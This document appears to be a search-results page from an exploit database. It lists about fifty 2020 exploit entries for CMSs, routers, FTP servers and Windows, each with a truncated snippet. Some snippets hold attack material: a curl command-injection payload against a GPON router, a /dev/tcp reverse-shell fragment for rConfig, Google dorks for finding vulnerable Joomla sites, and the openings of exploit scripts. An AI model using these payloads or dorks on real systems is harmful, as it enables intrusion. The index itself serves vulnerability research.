47904 matches found
UliCMS 2020.1 - Persistent Cross-Site Scripting
Exploit Title: UliCMS 2020.1 - Persistent Cross-Site Scripting Google Dork: N/A Date: 2019-03-24 Exploit Author: SunCSR Vendor Homepage: https://en.ulicms.de Software Link: https://en.ulicms.de/currentversions.html Version: 2020.1 Tested on: Windows CVE : CVE-2020-12704 Vulnerability : Stored...
UCM6202 1.0.18.13 - Remote Command Injection
Exploit Title: UCM6202 1.0.18.13 - Remote Command Injection Date: 2020-03-23 Exploit Author: Jacob Baines Vendor: http://www.grandstream.com Product Link: http://www.grandstream.com/products/ip-pbxs/ucm-series-ip-pbxs/product/ucm6200-series Tested on: UCM6202 1.0.18.13 CVE : CVE-2020-5722 Shodan...
Wordpress Plugin PicUploader 1.0 - Remote File Upload
Exploit Title: Wordpress Plugin PicUploader 1.0 - Remote File Upload Google Dork: N/A Date: 2020.03.22 Exploit Author: Milad Karimi Vendor Homepage: https://github.com/xiebruce/PicUploader Software Link: https://github.com/xiebruce/PicUploader Category : webapps Version: 1.0 Tested on: windows 10...
CyberArk PSMP 10.9.1 - Policy Restriction Bypass
Exploit Title: CyberArk PSMP 10.9.1 - Policy Restriction Bypass Google Dork: NA Date: 2020-02-25 Exploit Author: LAHBAL Said Vendor Homepage: https://www.cyberark.com/ Software Link: https://www.cyberark.com/ Version: PSMP = 11.1 Prerequisites Policy allows us to overwrite PSMRemoteMachine...
FIBARO System Home Center 5.021 - Remote File Include
Exploit Title: FIBARO System Home Center 5.021 - Remote File Include Date: 2020-03-22 Author: LiquidWorm Vendor: https://www.fibaro.com CVE: N/A Vendor: FIBAR GROUP S.A. Product web page: https://www.fibaro.com Affected version: Home Center 3, Home Center 2, Home Center Lite 5.021.38 4.580 4.570...
ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service PoC Author: Ivan Marmolejo Date: 2020-03-22 Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 Software Link: App Store for iOS devices Tested Version: 5.0.25920 Vulnerability Type: Denial of Service...
rConfig 3.9.4 - 'search.crud.php' Remote Command Injection
Exploit Title: rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Date: 2020-03-21 Exploit Author: Matthew Aberegg, Michael Burkey Vendor Homepage: https://www.rconfig.com Software Link: https://www.rconfig.com/downloads/rconfig-3.9.4.zip Version: rConfig 3.9.4 Tested on: Cent OS 7 1908...
Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection
Exploit Title: Joomla! comhdwplayer 4.2 - 'search.php' SQL Injection Dork: inurl:"index.php?option=comhdwplayer" Date: 2020-03-23 Exploit Author: qw3rTyTy Vendor Homepage: https://www.hdwplayer.com/ Software Link: https://www.hdwplayer.com/download/ Version: 4.2 Tested on: Debian/Nginx/Joomla!...
Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC)
Exploit Title: Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service PoC Google Dork: N/A Date: 2020-02-21 Exploit Author: Cem Onat Karagun of Diesec GmBH Vendor Homepage: https://www.google.com/ Version: Google Chrome 80.0.3987.87 Tested on: Windows x64 / Linux Debian x64 / MacOS...
Sony Playstation 4 (PS4) < 7.02 / FreeBSD 9 / FreeBSD 12 - 'ip6_setpktopt' Kernel Local Privilege Escalation (PoC)
/ FreeBSD 12.0-RELEASE x64 Kernel Exploit Usage: $ clang -o exploit exploit.c -lpthread $ ./exploit / include include include include include include include include define KERNEL include undef KERNEL define WANTFILE include include include include include define WANTSOCKET include include define...
Exagate Sysguard 6001 - Cross-Site Request Forgery (Add Admin)
Exploit Title: Exagate Sysguard 6001 - Cross-Site Request Forgery Add Admin Exploit Author: Metin Yunus Kandemir Vendor Homepage: https://www.exagate.com/ Software Link: https://www.exagate.com/sysguard-6001 Version: SYSGuard 6001 HTML CSRF PoC :...
VMware Fusion 11.5.2 - Privilege Escalation
Exploit Title: VMware Fusion 11.5.2 - Privilege Escalation Date: 2020-03-17 Exploit Author: Rich Mirch Vendor Homepage: https://www.vmware.com/products/fusion.html Vendor Advisory: https://www.vmware.com/security/advisories/VMSA-2020-0005.html Software Link:...
Broadcom Wi-Fi Devices - 'KR00K Information Disclosure
Kr00ker Experimetal KR00K PoC in python3 using scapy Description: This script is a simple experiment to exploit the KR00K vulnerability CVE-2019-15126, that allows to decrypt some WPA2 CCMP data in vulnerable devices. More specifically this script attempts to retrieve Plaintext Data of WPA2 CCMP...
Netlink GPON Router 1.0.11 - Remote Code Execution
Exploit Title: Netlink GPON Router 1.0.11 - Remote Code Execution Date: 2020-03-17 Exploit Author: shellord Vendor Homepage: https://www.netlink-india.com/ Version: 1.0.11 Tested on: Windows 10 CVE: N/A Exploit : curl -L -d "targetaddr=;ls /&waninf=1INTERNETRVID154"...
Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)
Excploit Title: Microtik SSH Daemon 6.44.3 - Denial of Service PoC Author: Hosein Askari Date: 2020-03-18 Vendor Homepage: https://mikrotik.com/ Model: hAP lite Processor architecture: smips Affected Version: through 6.44.3 CVE: N/A Description: An uncontrolled resource consumption vulnerability ...
NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path
Exploit Title: NetBackup 7.0 - 'NetBackup INET Daemon' Unquoted Service Path Discovery by: Alan Mondragon "El Masas" Discovery Date: 2020-03-17 Vendor Homepage: https://www.veritas.com/ Software Link : https://www.veritas.com/ Veritas Tested Version: 7.0 Vulnerability Type: Unquoted t Service Pat...
Joomla! Component ACYMAILING 3.9.0 - Unauthenticated Arbitrary File Upload
Exploit Title: Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload Google Dork: inurl:"index.php?option=comacym" Date: 2020-03-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.acyba.com/ Software Link: https://www.acyba.com/acymailing/download.html Version: v6.9.1...
Rconfig 3.x - Chained Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Rconfig 3.x Chained Remote Code Execution', 'Description' = ' This module exploits multiple vulnerabilities in rConfig version 3.9 in order to...
Microsoft VSCode Python Extension - Code Execution
VSCode Python Extension Code Execution This repository contains the Proof-of-Concept of a code execution vulnerability discovered in the Visual Studio Code Python extension. TL;DR: VScode may use code from a virtualenv found in the project folders without asking the user, for things such as...
UADMIN Botnet 1.0 - 'link' SQL Injection
Exploit Title: UADMIN Botnet 1.0 - 'link' SQL Injection Google Dork: n/a Date: 2020-03-16 Exploit Author: n4pst3r Vendor Homepage: unkn0wn Software Link: unkn0wn Version: unkn0wn Tested on: Windows 10, Kali CVE : n/a Vuln-Code: download.php $link=$GET'link'; $agent=esc$SERVER'HTTPUSERAGENT';...
ManageEngine Desktop Central - Java Deserialization (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ManageEngine Desktop Central Java Deserialization', 'Description' = %q This module exploits a Java deserialization vulnerability in the...
VMWare Fusion - Local Privilege Escalation
Local Privilege Escalation via VMWare Fusion Overview: A directory traversal vulnerability in VMware Fusion's SUID binaries can allow an attacker to run commands as the root user. Tested Versions: VMware Fusion 10.1.3 9472307 on macOS 10.13.6 VMware Fusion 11.0.0 10120384 on macOS 10.14.1 VMware...
Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery Add Admin Date: 2020-03-05 Exploit Author: Miguel Mendez Z. Vendor Homepage: www.sumavision.com Software Link: http://www.sumavision.com/ensite/i.php?id=29 Version: EMR 3.0.4.27 CVE : CVE-2020-10181...
PHPKB Multi-Language 9 - Authenticated Remote Code Execution
Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version: Multi-Language v9 Tested on...
PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version:...
PHPKB Multi-Language 9 - Authenticated Directory Traversal
Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal Google Dork: N/A Date: 2020-03-15 Exploit Author: Antonio Cannito Vendor Homepage: https://www.knowledgebase-script.com/ Software Link: https://www.knowledgebase-script.com/pricing.php Version: Multi-Language v9 Tested on:...
MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection Google Dork: Powered By MiladWorkShop VIP System Date: 2020-03-03 Exploit Author: AYADI Mohamed email : [email protected] Vendor Homepage: https://miladworkshop.ir/ Software Link: https://miladworkshop.ir/vip.html Version:...
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Buffer Overflow (PoC)
CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost Download https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48216.zip Usage ./CVE-2020-0796.py servername This script connects to the target host, and compresses the authentication request with a bad offset field set in t...
Centos WebPanel 7 - 'term' SQL Injection
Exploit Title: Centos WebPanel 7 - 'term' SQL Injection Google Dork: N/A Date: 2020-03-03 Exploit Author: Berke YILMAZ Vendor Homepage: http://centos-webpanel.com/ Software Link: http://centos-webpanel.com/ Version: v6 - v7 Tested on: Kali Linux - Windows 10 CVE : CVE-2020-10230 Type: Error Based...
WordPress Plugin Custom Searchable Data System - Unauthenticated Data M]odification
Exploit Title: Wordpress Plugin Custom Searchable Data System - Unauthenticated Data modification Date: 13 March 2020 Exploit Author: Nawaf Alkeraithe Vendor Homepage: https://wordpress.org/plugins/custom-searchable-data-entry-system/ Software Link:...
Drobo 5N2 4.1.1 - Remote Command Injection
Exploit Title: Drobo 5N2 4.1.1 - Remote Command Injection Date: 2020-03-12 Exploit Author: Rick Ramgattie, Ian Sindermann Vendor Homepage: https://www.drobo.com/ Version: 4.1.1 and lower. CVE: CVE-2018-14709, CVE-2018-14701 !/usr/bin/env python3 nasty.py - A proof-of-concept utility for malicious...
AnyBurn 4.8 - Buffer Overflow (SEH)
Exploit Title: AnyBurn 4.8 - Buffer Overflow SEH Date: 2020-03-09 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Authors: "Richard Davy/Gary Nield" Tested Version: 4.8 32-bit Tested on: Windows 10 Enterprise x64 Vulnerability Type: Buffer...
WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection
Exploit Title: Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection Google Dork: N/A Date: 2020-03-05 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://www.codepeople.net/ Software Link: https://downloads.wordpress.org/plugin/appointment-booking-calendar.zip Version:...
WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure
Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Author: RedTeam Pentesting GmbH Date: 2020-03-11 Vendor: https://www.watchguard.com Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdradhelperc.html CVE:...
Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
Exploit Title: Joomla! Component comnewsfeeds 1.0 - 'feedid' SQL Injection Date: 2020-03-10 Author: Milad Karimi Software Link: Version: Category : webapps Tested on: windows 10 , firefox CVE : CWE-89 Dork: inurl:index.php?option=comnewsfeeds...
ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path
Exploit Title: ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-11 Vendor Homepage: https://www.asus.com/ Software Link...
HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin)
Exploit Title: HRSALE 1.1.8 - Cross-Site Request Forgery Add Admin Date: 2020-03-11 Exploit Author: Ismail Akıcı Vendor Homepage: http://hrsale.com/ Software Link : http://demo.hrsale.com/ Software : HRSALE v1.1.8 Product Version: v1.1.8 Vulnerability Type : Cross-Site Request Forgery Add Admin...
rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution
Exploit Title: rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution Date: 2020-03-08 Exploit Author: Engin Demirbilek Vendor Homepage: https://www.rconfig.com/ Version: rConfig & /dev/tcp// 0&1;".formatsys.argv4, sys.argv5 login = 'user':user, 'pass':password, 'sublogin':'1' r...
rConfig 3.9 - 'searchColumn' SQL Injection
Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection Exploit Author: vikingfr Date: 2020-03-03 CVE-2020-10220 Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfigCVE-2020-10220.py Vendor Homepage: https://rconfig.com/ see also : https://github.com/rconfig/rconfig...
CoreFTP 2.0 Build 674 SIZE - Directory Traversal (Metasploit)
class MetasploitModule 'CVE-2019-9648 CoreFTP FTP Server Version 674 and below SIZE Directory Traversal', 'Description' = %qAn issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. A directory traversal vulnerability exists using the SIZE command along with a .......
TeamCity Agent XML-RPC 10.0 - Remote Code Execution
Exploit Title: TeamCity Agent XML-RPC 10.0 - Remote Code Execution Date: 2020-03-20 Exploit Author: Dylan Pindur Vendor Homepage: https://www.jetbrains.com/teamcity/ Version: TeamCity buildAgent.runBuild 123456 x ONAGENT x system.build.number 0 myVcsRootCurrentRev...
Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion
exploit-inc-inclusion.py !/usr/bin/env python3 from horde import Horde import subprocess import sys TEMPDIR = '/tmp' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode = sys.argv5 log into the web application horde = Hordebaseurl,...
Wing FTP Server - Authenticated CSRF (Delete Admin)
Exploit Title: Wing FTP Server 6.2.3 - Privilege Escalation Date: 2020-03-10 Exploit Author: Dhiraj Mishra Vendor Homepage: https://www.wftpserver.com Version: v6.2.6 Tested on: Windows 10 Summary: An authenticated CSRF exists in web client and web administration of Wing FTP v6.2.6, a crafted HTM...
PlaySMS 1.4.3 - Template Injection / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PlaySMS 1.4.3 Pre Auth Template Injection Remote Code Execution', 'Description' = %q This module exploits a Preauth Server-Side Template Injectio...
WordPress Plugin Search Meter 2.13.2 - CSV injection
Exploit Title: Wordpress Plugin Search Meter 2.13.2 - CSV Injection Google Dork: N/A Date: 2020-03-10 Exploit Author: Daniel Monzón stark0de Vendor Homepage: https://thunderguy.com/semicolon/ Software Link: https://downloads.wordpress.org/plugin/search-meter.2.13.2.zip Version: 2.13.2 Tested on:...
ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path
Exploit Title: ASUS AXSP 1.02.00 - 'asComSvc' Unquoted Service Path Discovery by: Roberto Piña Discovery Date: 2020-03-10 Vendor Homepage: https://www.asus.com/ Software Link...
Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
exploit-phar-loading.py !/usr/bin/env python3 from horde import Horde import requests import subprocess import sys TEMPDIR = '/tmp' WWWROOT = '/var/www/html' if lensys.argv ' sys.exit1 baseurl = sys.argv1 username = sys.argv2 password = sys.argv3 filename = sys.argv4 phpcode = sys.argv5 source =...
CTROMS Terminal OS Port Portal - 'Password Reset' Authentication Bypass (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' , 'Description' = %q This module exploits an authentication bypass in...
CoreFTP 2.0 Build 674 MDTM - Directory Traversal (Metasploit)
class MetasploitModule 'CVE-2019-9649 CoreFTP FTP Server Version 674 and below MDTM Directory Traversal', 'Description' = %qAn issue was discovered in the SFTP Server component in Core FTP 2.0 Build 674. Using the MDTM FTP command, a remote attacker can use a directory traversal ....\ to browse...
Joomla! 3.9.0 < 3.9.7 - CSV Injection
!/usr/bin/python3 Exploit Title: Joomla 3.9.0 ' printf'Example: sys.argv0 http://127.0.0.1 ' sys.exit1 baseurl = sys.argv1 regurl = f"baseurl/joomla/index.php/component/users/?view=registration&Itemid=101" loginurl = f"baseurl/joomla/index.php?option=comusers" def pwnusername='abdullah': payload ...